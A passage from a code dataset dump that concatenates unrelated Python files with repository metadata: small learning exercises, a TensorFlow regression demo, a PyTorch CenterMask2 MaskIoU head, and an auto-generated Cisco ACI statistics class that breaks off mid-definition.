"juan@tcad.com"
] | juan@tcad.com |
600cb4a4a0fb0c02fd641c0744d20d4413860cd0 | 8d2abf7ad4c3f35801f6bfdb38a4d6cddf1e0fbd | /0404/demo03.py | b105dd59dfb4f75a1769f41c31d1d8eb5067af08 | [] | no_license | erroren/Python_A | e9dfba73fc09160e4d3b8ea994183e2735f9d36e | 47901316902705e513ea7d6e016f98f1cd2d3e85 | refs/heads/master | 2020-05-04T14:27:29.118843 | 2019-06-13T08:50:03 | 2019-06-13T08:50:03 | 179,197,541 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | L = [x for x in range(10)]
print(L, type(L), L.__sizeof__())
L1 = (x for x in range(10))
print(L1, type(L1), L1.__sizeof__())
# print(L1.__next__())
def run(L1):
for i in L1:
yield i
r = run(L1)
while True:
try:
print(next(r))
except Exception as e:
print(e)
break
| [
"hcy@qq.com"
] | hcy@qq.com |
7580457f1767cfc3fd8424fd738c1d6e49fa6094 | c0f5d309576f791f8cc062e2d0cad340eec41d7d | /190326_electric_bus_2.py | 0045a43b557135b855703e93b6422e9e110f0f7f | [] | no_license | mjjin1214/algorithm | fa91455ab792c38d01fd210c12e53e50f516eb55 | 423119406061443939b4b966c7d9f1513544dd03 | refs/heads/master | 2020-04-22T19:31:23.981387 | 2019-04-05T07:58:10 | 2019-04-05T07:58:10 | 170,610,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | import sys
sys.stdin = open('input1.txt')
def backtrack(x, count):
global min_count
if count >= min_count:
return
if x >= data[0]:
if min_count > count:
min_count = count
return
for i in range(data[x], 0, -1):
backtrack(x+i, count+1)
T = int(input())
for t in range(T):
data = list(map(int, input().split()))
min_count = data[0]
backtrack(1, 0)
print('#{} {}'.format(t+1, min_count-1)) | [
"moc0etan@gmail.com"
] | moc0etan@gmail.com |
f7a398e1bd474d711dd6004b39549a4426d9920a | 388556baa0c2ee53d8767ae8a4bce18c03124488 | /Chapter10/0011_rev09_match_z.py | b30aaea61405322ecf5e6f08f6aa090553e2a735 | [] | no_license | 8563a236e65cede7b14220e65c70ad5718144a3/introduction-python-programming-solutions | 6e2e7c8cf8babc3c63f75d8d5e987f4dbc018269 | f21d70ae2062cc2d5d3a2fefce81a2a3b4ea3bfd | refs/heads/master | 2022-12-10T04:24:56.364629 | 2020-07-01T11:34:01 | 2020-07-01T11:34:01 | 294,878,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | """
Review Question 9
Matches a word containing "z"
"""
import re
def main():
user_string = input("Enter sequence ")
pattern = re.compile(r"\b\w*z\w*\b")
match_object = pattern.search(user_string)
if match_object:
print("Match found")
print(match_object.group())
else:
print("No match found")
if __name__ == "__main__":
main()
| [
"warren.jitsing@gmail.com"
] | warren.jitsing@gmail.com |
37ad454a8a7d3c8cc63dd66a836de528d210b27f | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03240/s819025179.py | 868e91e9b7562f6eedc217a4bfc2a8b1b491522a | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,979 | py | import sys
import os
import math
import bisect
import itertools
import collections
import heapq
import queue
import array
# 時々使う
# from scipy.sparse.csgraph import csgraph_from_dense, floyd_warshall
# from decimal import Decimal
# from collections import defaultdict, deque
# 再帰の制限設定
sys.setrecursionlimit(10000000)
def ii(): return int(sys.stdin.buffer.readline().rstrip())
def il(): return list(map(int, sys.stdin.buffer.readline().split()))
def fl(): return list(map(float, sys.stdin.buffer.readline().split()))
def iln(n): return [int(sys.stdin.buffer.readline().rstrip())
for _ in range(n)]
def iss(): return sys.stdin.buffer.readline().decode().rstrip()
def sl(): return list(map(str, sys.stdin.buffer.readline().decode().split()))
def isn(n): return [sys.stdin.buffer.readline().decode().rstrip()
for _ in range(n)]
def lcm(x, y): return (x * y) // math.gcd(x, y)
# MOD = 10 ** 9 + 7
MOD = 998244353
INF = float('inf')
def main():
if os.getenv("LOCAL"):
sys.stdin = open("input.txt", "r")
N = ii()
xyh = [il() for _ in range(N)]
for cx in range(0, 101):
for cy in range(0, 101):
tmp_x, tmp_y, tmp_h = -1, -1, -1
for x, y, h in xyh:
# 高さが1以上の調査点から
# ピラミッドの中心を求める
if h == 0:
continue
tmp_x, tmp_y = cx, cy
tmp_h = h + abs(x - cx) + abs(y - cy)
break
if tmp_h != -1:
# 求めた中心が全ての調査点の条件と
# 一致するか否かを確かめる
for x, y, h in xyh:
if h != max(tmp_h - abs(x - tmp_x) - abs(y - tmp_y), 0):
break
else:
print(tmp_x, tmp_y, tmp_h)
exit()
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
83bd218a3a6158cde57369b86689442952cd1249 | f8ad6963bfc851657ea50c6a036cfad29cdd7f60 | /Books/LearningTensorFlow/Chapter3_Tensorflow_Basic_Understand/subchapter_03_04_Linear_Regression.py | 9c139d920a30a7310ed8b501626cfe7d1ea747e6 | [] | no_license | foru120/PythonRepository | e1ab0265c0f50ef2e9acdf7447237c913560692b | db6b6be0f9fb91b0a81a3b6a2ec5631daab10f98 | refs/heads/master | 2021-01-01T06:53:11.728109 | 2019-04-25T13:52:50 | 2019-04-25T13:52:50 | 97,541,222 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,265 | py | import numpy as np
import tensorflow as tf
x_data = np.random.randn(2000, 3)
w_real = [0.3, 0.5, 0.1]
b_real = -0.2
noise = np.random.randn(1, 2000) * 0.1
y_data = np.matmul(w_real, x_data.T) + b_real + noise
NUM_STEPS = 10
g = tf.Graph()
wb_ = []
with g.as_default():
x = tf.placeholder(dtype=tf.float32, shape=[None, 3])
y_true = tf.placeholder(dtype=tf.float32, shape=None)
with tf.name_scope('inference') as scope:
w = tf.Variable([[0, 0, 0]], dtype=tf.float32, name='weights')
b = tf.Variable(0, dtype=tf.float32, name='bias')
y_pred = tf.matmul(w, tf.transpose(x)) + b
with tf.name_scope('loss') as scope:
loss = tf.reduce_mean(tf.square(y_true - y_pred))
with tf.name_scope('train') as scope:
learning_rate = 0.5
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
train = optimizer.minimize(loss)
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
for step in range(NUM_STEPS):
sess.run(train, {x: x_data, y_true: y_data})
if step % 5 == 0:
print(step, sess.run([w, b]))
wb_.append(sess.run([w, b]))
print(10, sess.run([w, b])) | [
"broodsky1122@hanmail.net"
] | broodsky1122@hanmail.net |
53a3368b892b1ea07bd5aed868eef146253be066 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/others/CenterMask2/models/centermask2/centermask/modeling/centermask/maskiou_head.py | 23823fce2c12478ba7bdb4b83597a3363504cb80 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 4,952 | py | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright (c) Sangrok Lee and Youngwan Lee (ETRI) All Rights Reserved.
import torch
from torch import nn
from torch.nn import functional as F
from detectron2.layers import Conv2d, ShapeSpec, cat
from detectron2.utils.registry import Registry
from centermask.layers import MaxPool2d, Linear
ROI_MASKIOU_HEAD_REGISTRY = Registry("ROI_MASKIOU_HEAD")
ROI_MASKIOU_HEAD_REGISTRY.__doc__ = """
Registry for maskiou heads, which predicts predicted mask iou.
The registered object will be called with `obj(cfg, input_shape)`.
"""
def mask_iou_loss(labels, pred_maskiou, gt_maskiou, loss_weight, weight):
"""
Compute the maskiou loss.
Args:
labels (Tensor): Given mask labels (num of instance,)
pred_maskiou (Tensor): A tensor of shape (num of instance, C)
gt_maskiou (Tensor): Ground Truth IOU generated in mask head (num of instance,)
"""
def l2_loss(input, target):
"""
very similar to the smooth_l1_loss from pytorch, but with
the extra beta parameter
"""
pos_inds = target > 0.0
if pos_inds.sum() > 0:
cond = torch.abs(input - target)
loss = 0.5 * cond**2 / pos_inds.sum()
else:
loss = input * 0.0
return (loss*weight.float()*pos_inds.float()).sum()
if labels.numel() == 0:
return pred_maskiou.sum() * 0
index = torch.arange(pred_maskiou.shape[0]).to(device=pred_maskiou.device)
maskiou_loss = l2_loss(pred_maskiou[index, labels], gt_maskiou)
maskiou_loss = loss_weight * maskiou_loss
return maskiou_loss
def mask_iou_inference(pred_instances, pred_maskiou):
labels = cat([i.pred_classes for i in pred_instances])
num_masks = pred_maskiou.shape[0]
index = torch.arange(num_masks, device=labels.device).long()
num_boxes_per_image = [len(i) for i in pred_instances]
maskious = pred_maskiou[index, labels].split(num_boxes_per_image, dim=0)
for maskiou, box in zip(maskious, pred_instances):
box.mask_scores = box.scores * maskiou
@ROI_MASKIOU_HEAD_REGISTRY.register()
class MaskIoUHead(nn.Module):
def __init__(self, cfg, input_shape: ShapeSpec):
super(MaskIoUHead, self).__init__()
# fmt: off
num_classes = cfg.MODEL.ROI_HEADS.NUM_CLASSES
conv_dims = cfg.MODEL.ROI_MASKIOU_HEAD.CONV_DIM
num_conv = cfg.MODEL.ROI_MASKIOU_HEAD.NUM_CONV
input_channels = input_shape.channels + 1
resolution = input_shape.width // 2
# fmt: on
self.conv_relus = []
stride = 1
for k in range(num_conv):
if (k+1) == num_conv:
stride = 2
conv = Conv2d(
input_channels if k == 0 else conv_dims,
conv_dims,
kernel_size=3,
stride=stride,
padding=1,
activation=F.relu
)
self.add_module("maskiou_fcn{}".format(k+1), conv)
self.conv_relus.append(conv)
self.maskiou_fc1 = Linear(conv_dims*resolution**2, 1024)
self.maskiou_fc2 = Linear(1024, 1024)
self.maskiou = Linear(1024, num_classes)
self.pooling = MaxPool2d(kernel_size=2, stride=2)
for l in self.conv_relus:
nn.init.kaiming_normal_(l.weight, mode="fan_out", nonlinearity="relu")
nn.init.constant_(l.bias, 0)
for l in [self.maskiou_fc1, self.maskiou_fc2]:
nn.init.kaiming_normal_(l.weight, mode="fan_out", nonlinearity="relu")
nn.init.constant_(l.bias, 0)
nn.init.normal_(self.maskiou.weight, mean=0, std=0.01)
nn.init.constant_(self.maskiou.bias, 0)
def forward(self, x, mask):
mask_pool = self.pooling(mask)
x = torch.cat((x, mask_pool), 1)
for layer in self.conv_relus:
x = layer(x)
x = torch.flatten(x, 1)
x = F.relu(self.maskiou_fc1(x))
x = F.relu(self.maskiou_fc2(x))
x = self.maskiou(x)
return x
def build_maskiou_head(cfg, input_shape):
"""
Build a mask iou head defined by `cfg.MODEL.ROI_MASKIOU_HEAD.NAME`.
"""
name = cfg.MODEL.ROI_MASKIOU_HEAD.NAME
return ROI_MASKIOU_HEAD_REGISTRY.get(name)(cfg, input_shape)
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
cee4f5e9ab599c026446b96d93c2e66655e40d5a | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/2/e1d.py | f4e740d648e64bd3e1c4e1cecebe54f7d92f4451 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'e1D':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
c1c6756e478054f83269309dca7764671c194c3a | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/eqptcapacity/l3v6usage1281w.py | eee8ed196b025d43c82b77745a416ef422f9880d | [] | no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36,152 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class L3v6Usage1281w(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = StatsClassMeta("cobra.model.eqptcapacity.L3v6Usage1281w", "Layer3 v6 128 entries usage count")
counter = CounterMeta("v6Total", CounterCategory.COUNTER, "count", "Total v6 128 Routes")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "v6TotalLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "v6TotalCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "v6TotalPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "v6TotalMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "v6TotalMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "v6TotalAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "v6TotalSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "v6TotalBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "v6TotalThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "v6TotalTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "v6TotalTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "v6TotalRate"
meta._counters.append(counter)
counter = CounterMeta("v6Mc", CounterCategory.COUNTER, "count", "Total v6 128 MC Routes")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "v6McLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "v6McCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "v6McPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "v6McMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "v6McMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "v6McAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "v6McSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "v6McBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "v6McThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "v6McTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "v6McTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "v6McRate"
meta._counters.append(counter)
counter = CounterMeta("v6Uc", CounterCategory.COUNTER, "count", "Total v6 128 UC Routes")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "v6UcLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "v6UcCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "v6UcPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "v6UcMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "v6UcMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "v6UcAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "v6UcSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "v6UcBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "v6UcThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "v6UcTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "v6UcTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "v6UcRate"
meta._counters.append(counter)
counter = CounterMeta("v6Ep", CounterCategory.COUNTER, "count", "Total v6 128 Endpoints")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "v6EpLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "v6EpCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "v6EpPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "v6EpMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "v6EpMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "v6EpAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "v6EpSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "v6EpBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "v6EpThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "v6EpTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "v6EpTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "v6EpRate"
meta._counters.append(counter)
meta.moClassName = "eqptcapacityL3v6Usage1281w"
meta.rnFormat = "CDeqptcapacityL3v6Usage1281w"
meta.category = MoCategory.STATS_CURRENT
meta.label = "current Layer3 v6 128 entries usage count stats in 1 week"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.eqptcapacity.Entity")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Curr")
meta.superClasses.add("cobra.model.eqptcapacity.L3v6Usage128")
meta.rnPrefixes = [
('CDeqptcapacityL3v6Usage1281w', False),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "v6EpAvg", "v6EpAvg", 44094, PropCategory.IMPLICIT_AVG)
prop.label = "Total v6 128 Endpoints average value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpAvg", prop)
prop = PropMeta("str", "v6EpBase", "v6EpBase", 44089, PropCategory.IMPLICIT_BASELINE)
prop.label = "Total v6 128 Endpoints baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpBase", prop)
prop = PropMeta("str", "v6EpCum", "v6EpCum", 44090, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Total v6 128 Endpoints cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpCum", prop)
prop = PropMeta("str", "v6EpLast", "v6EpLast", 44088, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Total v6 128 Endpoints current value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpLast", prop)
prop = PropMeta("str", "v6EpMax", "v6EpMax", 44093, PropCategory.IMPLICIT_MAX)
prop.label = "Total v6 128 Endpoints maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpMax", prop)
prop = PropMeta("str", "v6EpMin", "v6EpMin", 44092, PropCategory.IMPLICIT_MIN)
prop.label = "Total v6 128 Endpoints minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpMin", prop)
prop = PropMeta("str", "v6EpPer", "v6EpPer", 44091, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Total v6 128 Endpoints periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpPer", prop)
prop = PropMeta("str", "v6EpRate", "v6EpRate", 44099, PropCategory.IMPLICIT_RATE)
prop.label = "Total v6 128 Endpoints rate"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpRate", prop)
prop = PropMeta("str", "v6EpSpct", "v6EpSpct", 44095, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Total v6 128 Endpoints suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpSpct", prop)
prop = PropMeta("str", "v6EpThr", "v6EpThr", 44096, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Total v6 128 Endpoints thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("v6EpThr", prop)
prop = PropMeta("str", "v6EpTr", "v6EpTr", 44098, PropCategory.IMPLICIT_TREND)
prop.label = "Total v6 128 Endpoints trend"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpTr", prop)
prop = PropMeta("str", "v6EpTrBase", "v6EpTrBase", 44097, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Total v6 128 Endpoints trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6EpTrBase", prop)
prop = PropMeta("str", "v6McAvg", "v6McAvg", 44115, PropCategory.IMPLICIT_AVG)
prop.label = "Total v6 128 MC Routes average value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McAvg", prop)
prop = PropMeta("str", "v6McBase", "v6McBase", 44110, PropCategory.IMPLICIT_BASELINE)
prop.label = "Total v6 128 MC Routes baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McBase", prop)
prop = PropMeta("str", "v6McCum", "v6McCum", 44111, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Total v6 128 MC Routes cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McCum", prop)
prop = PropMeta("str", "v6McLast", "v6McLast", 44109, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Total v6 128 MC Routes current value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McLast", prop)
prop = PropMeta("str", "v6McMax", "v6McMax", 44114, PropCategory.IMPLICIT_MAX)
prop.label = "Total v6 128 MC Routes maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McMax", prop)
prop = PropMeta("str", "v6McMin", "v6McMin", 44113, PropCategory.IMPLICIT_MIN)
prop.label = "Total v6 128 MC Routes minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McMin", prop)
prop = PropMeta("str", "v6McPer", "v6McPer", 44112, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Total v6 128 MC Routes periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McPer", prop)
prop = PropMeta("str", "v6McRate", "v6McRate", 44120, PropCategory.IMPLICIT_RATE)
prop.label = "Total v6 128 MC Routes rate"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McRate", prop)
prop = PropMeta("str", "v6McSpct", "v6McSpct", 44116, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Total v6 128 MC Routes suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McSpct", prop)
prop = PropMeta("str", "v6McThr", "v6McThr", 44117, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Total v6 128 MC Routes thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
